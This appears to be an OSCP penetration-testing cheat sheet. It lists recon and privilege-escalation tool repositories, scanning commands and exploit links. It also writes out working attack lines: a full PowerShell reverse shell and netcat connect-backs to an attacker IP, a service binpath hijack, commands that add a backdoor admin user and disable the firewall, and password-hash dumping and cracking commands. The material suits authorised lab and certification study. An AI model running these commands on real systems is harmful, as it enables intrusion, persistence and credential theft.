Pull requests welcome.
Clone the following repositories:
- https://github.com/superkojiman/onetwopunch - Wrapper around nmap/unicorn scanner
- https://github.com/AutoRecon/AutoRecon - Another recon script
- https://github.com/codingo/Reconnoitre - Recon script with suggested follow-up commands
- https://github.com/jivoi/pentest - Fully automated recon
- https://github.com/danielmiessler/SecLists - Wordlists
- https://github.com/mthbernardes/rsg - Reverse shell generator
- https://github.com/rebootuser/LinEnum - Linux privesc enumeration
- https://github.com/mzet-/linux-exploit-suggester - Linux privesc enumeration
- https://github.com/TH3xACE/SUDO_KILLER - Bash script to search for
sudo -lmisconfigs - https://github.com/M4ximuss/Powerless - Windows privesc enumeration (non-powershell)
- https://github.com/PowerShellMafia/PowerSploit - Windows Powershell-based privesc
- https://github.com/411Hall/JAWS - Windows privesc enumeration (powershell)
- https://github.com/absolomb/WindowsEnum - Windows privesc enumeration (powershell)
- https://github.com/rasta-mouse/Sherlock - Windows kernel exploit checker
- https://github.com/ankh2054/windows-pentest - Windows pentest scripts
- https://github.com/SecWiki/windows-kernel-exploits - Precompiled Windows kernel exploits
- https://github.com/51x/WHP - Collection of Windows attack tools and exploits
- https://github.com/AusJock/Privilege-Escalation - Windows/Linux kernel exploits
- https://github.com/3ndG4me/AutoBlue-MS17-010 - MS17-010 for multiple systems
- https://github.com/GDSSecurity/Windows-Exploit-Suggester - Script that parses
systeminfooutput to suggest exploits
Or as a list of commands:
git clone --depth 1 https://github.com/superkojiman/onetwopunch.git
git clone --depth 1 https://github.com/AutoRecon/AutoRecon.git
git clone --depth 1 https://github.com/codingo/Reconnoitre.git
git clone --depth 1 https://github.com/jivoi/pentest.git
git clone --depth 1 https://github.com/danielmiessler/SecLists.git
git clone --depth 1 https://github.com/mthbernardes/rsg.git
git clone --depth 1 https://github.com/rebootuser/LinEnum.git
git clone --depth 1 https://github.com/mzet-/linux-exploit-suggester.git
git clone --depth 1 https://github.com/TH3xACE/SUDO_KILLER.git
git clone --depth 1 https://github.com/M4ximuss/Powerless.git
git clone --depth 1 https://github.com/411Hall/JAWS.git
git clone --depth 1 https://github.com/PowerShellMafia/PowerSploit.git
git clone --depth 1 https://github.com/absolomb/WindowsEnum.git
git clone --depth 1 https://github.com/rasta-mouse/Sherlock.git
git clone --depth 1 https://github.com/ankh2054/windows-pentest.git
git clone --depth 1 https://github.com/SecWiki/windows-kernel-exploits.git
git clone --depth 1 https://github.com/51x/WHP.git
git clone --depth 1 https://github.com/AusJock/Privilege-Escalation.git
git clone --depth 1 https://github.com/3ndG4me/AutoBlue-MS17-010.git
git clone --depth 1 https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
Beginning a pentest against a host? Start with the following commands:
nmap -A -sV --script=default,vuln,smb-vuln* -p- --open -oA tcp_10.11.1.x 10.11.1.x
nmap -A -sV -sU --script=default,vuln --open -oA udp_10.11.1.x 10.11.1.x
echo "10.11.1.x" > 10.11.1.x_target.txt && ~/Desktop/tools/onetwopunch.sh -i tap0 -t 10.11.1.x_target.txt
python3 ~/Desktop/tools/AutoRecon/autorecon.py "10.11.1.x" -v -o ~/Desktop/oscp
Searchsploit can run with nmap output: searchsploit --nmap tcp_10.11.1.x.xml
Ideally, your goal is to enumerate your attack surface in as much detail as possible: all exposed services, with full details (version, modules, and configuration)
Don't forget to try default creds. Not all scripts have useful console output. Wireshark may be useful for manually reviewing if auth is successful.
See https://guide.offsecnewbie.com/general-methodology
- Scan for anonymous access
- Filezilla fails to connect if the directory listing isn't allowed.
- Always use binary mode when transferring files
- FTP command line reference:
Connect: ftp <ip>
Binary mode: binary
List files: ls
Change dir: cd
Download file: get <file>
Upload file: put <file>
HTTP consists of several components:
- Web server
- Programming language (if any)
- Back-end platform/framework (Drupal, Wordpress, etc.) and plugins
- Front-end UI
Other notes:
- Each component has its own vulnerabilities. Front-end vulns are useful for XSS and the like.
- A web server listens on one or more ports. It can also run multiple languages and multiple frameworks at different paths.
- Apache, nginx, and Microsoft IIS are most common.
- Less-common webservers are more likely to have vulnerabilities and misconfigurations
- nikto to scan for vulns:
nikto -h [IP] -p [PORT] -o "[OUTPUT].txt" - whatweb to detect versions:
whatweb --aggression 2 www.example.com - gobuster to enumerate directories.
gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.11.1.x:80- If you know you can create files on a web server, but aren't sure where they are, bruteforcing is acceptable
- Recommended wordlists:
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtand/usr/share/seclists/Discovery/Web-Content/common.txt
Colfusion guide: https://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
wpscan --url www.example.com
- nmap -p 389 --script ldap-rootdse -Pn 1.2.3.4
- nmap -p 389 --script ldap-search -Pn 1.2.3.4
- ldapsearch -x -h 1.2.3.4 -s base namingcontexts
- ldapsearch -x -h 1.2.3.4 -b "dc=lightweight,dc=htb"
For Linux targets running SMB, it may be possible to find a version number in the raw network traffic with Wireshark in
the smb.native_lanman field.
If an exploit looks like it should be succesful, but is failing to connect back with a reverse shell, try cycling through common ports: 80, 443, 8080, 53
Try using other payloads besides reverse shell, if the exploit works. Adding an admin/root user and connecting via SSH/RDP is an alternative to an immediate root shell.
- Reverse shell one-liners: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Trying to figure out if a port is available for further connect-back? Try nmap + wireshark
On compromised host, run: nmap -sV -P0 -p- 10.11.0.57
On attacker system, use the following wireshark filter: ip.src == 10.11.1.252 && tcp.flags.syn == 1 && tcp.flags.ack == 0
If you see lazy passwords in one place of admin/admin, expect that there might be lazy passwords in other places too.
accesschk.exe /accepteula -c *for seeing services with RW access, so the service image path itself can be changed.- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- Sometimes files may be hidden. Use
dir /Ainstead of dir. - https://guif.re/windowseop
- Show user information:
net user username - Show information on group:
net localgroup administrators - May have stored credentials:
cmdkey /list- Escalate with:
runas /user:ACCESS\Administrator /savecred "command"
- Escalate with:
- Windows reverse shell:
$client = New-Object System.Net.Sockets.TCPClient("10.10.12.84",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
SMB server on Kali box is easiest way to run/transfer/exfil files.
- Start SMB server:
python /usr/share/doc/python-impacket/examples/smbserver.py -smb2support share /www- Note: Some Windows hosts are locked down and only allow SMB2
- Copy file:
COPY \\10.10.12.84\share\PowerUp.ps1 PowerUp.ps1 - Run command:
\\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80
After getting a shell, get a second shell with "start" in case the first one bugs up/hangs/crashes (assuming running SMB server):
victim > start \\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.X 5555 -e C:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
sc qc upnphost
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt- https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc and download PowerUp.ps1
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
- Add new admin:
net user hacker Winter2019! /add && net localgroup administrators hacker /add && net group administrators hacker /add - Disable windows firewall:
NetSh Advfirewall set allprofiles state off
- https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- Exploits: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
- http://www.fuzzysecurity.com/tutorials/16.html
- https://toshellandback.com/2015/11/24/ms-priv-esc/
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- Local Linux Enumeration & Privilege Escalation Cheatsheet (by author of LinEnum) - https://www.rebootuser.com/?p=1623
sudo -labuse: https://bitvijays.github.io/LFC-VulnerableMachines.html#sudo-l-permissions
LinEnum.sh -t -s
-
Compiling exploits:
gcc -o sploit 9545.c -Wl,--hash-style=both -
Recommended Kernel Exploits:
- FreeBSD 9.0: https://www.exploit-db.com/exploits/28718
- Ubuntu 16.04: https://www.exploit-db.com/exploits/39772
- Linux 2.6.9-89.EL: https://www.exploit-db.com/exploits/9545
- Linux beta 3.0.0-12-generic: https://gist.github.com/karthick18/1686299
- Linux Kernel 2.6.39 to 3.2.2 (x86/x64) - 'Mempodipper' - https://www.exploit-db.com/exploits/35161
- Linux core 2.6.32-21: https://www.exploit-db.com/exploits/14814/
- Diverse unix: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/blob/master/2009/CVE-2009-2692/2.6.18.c & https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack
- Diverse Windows: https://github.com/jivoi/pentest/blob/master/exploit_win/win_local_exploits.md
-
Exploiting services running as root that shouldn't be:
- Dump and crack hashes
- Linux:
- Dump:
cat /etc/shadoworcat /etc/shadow - Crack:
- Dump:
- Windows:
- Dump hashes #1:
wce32.exe -worwce64.exe -w - Dump hashes #2:
fgdump.exe && type *.pwdump - Crack with: https://hashkiller.co.uk/Cracker/NTLM
- Or:
john ./hashes.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt - Or:
hashcat -m 1000 hash.pwd /usr/share/wordlists/rockyou.txt --force
- Dump hashes #1:
- Linux:
- Look for interesting files only accessible to root/admin
- Sensitive files in Desktop or Documents
- Backup files
- Sensitive data in Windows Registry
- Python HTTP Server:
python -m SimpleHTTPServer <port> - Python SMB Server:
python /usr/share/doc/python-impacket/examples/smbserver.py share /www - wget in VBS: https://github.com/pythonmaster41/Go-For-OSCP/blob/master/Useful_Scripts/FILE_TRANSFER_Script/2.VBS/transfer-command.txt
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/
- When in doubt, it may be wise to assume common badchars (
\x00,CR,LF, - Online assembler: https://defuse.ca/online-x86-assembler.htm
- https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html - Amazing resource on methodology
- https://github.com/DigitalAftermath/EnumerationVisualized/wiki
- https://forums.offensive-security.com/showthread.php?4689-Offensive-Security-s-Complete-Guide-to-Alpha
- https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/
- https://sushant747.gitbooks.io/total-oscp-guide/
- https://blog.ropnop.com/transferring-files-from-kali-to-windows/ - File Transfer techniques
- http://www.fuzzysecurity.com/tutorials/16.html
- https://guif.re
- https://jhalon.github.io/OSCP-Review/
- https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/
- https://411hall.github.io/JAWS-Enumeration/
- https://www.securitysift.com/offsec-pwb-oscp/
- https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97
- https://www.reddit.com/r/oscp/comments/a9e2yv/from_0_to_oscp_in_90days/